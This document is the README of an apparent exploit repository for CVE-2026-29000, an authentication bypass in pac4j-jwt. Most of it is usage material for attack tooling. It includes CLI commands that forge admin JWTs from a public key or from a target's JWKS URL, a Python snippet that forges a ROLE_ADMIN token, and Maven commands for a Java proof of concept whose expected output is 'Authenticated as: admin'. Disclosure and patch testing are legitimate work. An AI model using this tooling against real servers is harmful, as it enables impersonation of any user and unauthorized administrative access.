Share
## https://sploitus.com/exploit?id=896BC665-9FC0-5CF1-B84E-9AE8E2571541
# CVE-2026-29000: pac4j-jwt JwtAuthenticator authentication bypass
Full buildout: writeup, Java in-process PoC, Python token-forge CLI and library, tests.
## Summary
- **CVE:** CVE-2026-29000 (CVSS 10, CWE-347)
- **Affected:** pac4j-jwt < 4.5.9 / < 5.7.9 / < 6.3.3 when using JWE + signature config
- **Issue:** JWE-wrapped **PlainJWT** (unsigned) bypasses signature verification; attacker with only the server RSA **public** key can forge tokens and authenticate as any user.
See [WRITEUP.md](WRITEUP.md) for details and PoC requirements.
## Layout
| Path | Description |
|------|-------------|
| `WRITEUP.md` | CVE summary, root cause, affected versions, PoC requirements, references |
| `poc/` | Java Maven PoC (in-process bypass against pac4j-jwt 6.0.3) |
| `token_forge/` | Python package: forge JWE-wrapped PlainJWT from PEM or JWKS URL |
| `tests/` | Pytest tests for claims, forge, keys, CLI |
| `requirements.txt` | Python deps (jwcrypto, requests, pytest) |
## Python (token forge)
### Setup
```bash
python3 -m venv .venv
source .venv/bin/activate # or .venv\Scripts\activate on Windows
pip install -r requirements.txt
```
### Run CLI
```bash
# From PEM (generate with: openssl genrsa 2048 | openssl rsa -pubout)
python -m token_forge --public-key /path/to/pub.pem --subject admin --roles "ROLE_ADMIN,ROLE_USER"
# From JWKS URL
python -m token_forge --jwks-url https://target/.well-known/jwks.json --subject admin
# Options: --exp-sec, --jwks-kid, --log-file, --enable-file-logging, --verbose
```
Output: single line (forged JWT); use as `Authorization: Bearer `.
### Library
```python
from token_forge import forge_token, load_public_key_from_pem, load_public_key_from_jwks_url
with open("pub.pem", "rb") as f:
key = load_public_key_from_pem(f.read())
token = forge_token(key, subject="admin", roles=["ROLE_ADMIN"], exp_sec=3600)
```
### Tests
```bash
pytest -vv --tb=short --maxfail=1
# or with warnings as errors:
pytest -vv -W error -W always --tb=short --maxfail=1
```
## Java PoC
### Build and run (requires Java 11+ and Maven)
```bash
cd poc
mvn -q compile exec:java -Dexec.mainClass="Poc"
# Or token-only (no in-process validation):
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--token-only"
# With custom subject/roles:
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--subject user --roles ROLE_A,ROLE_B"
```
Expected: `[BYPASS] Authenticated as: admin#override` and roles when running in-process.
## References
- [CodeAnt AI โ Full PoC and analysis](https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key)
- [pac4j security advisory](https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html)
- [OpenCVE CVE-2026-29000](https://app.opencve.io/cve/CVE-2026-29000)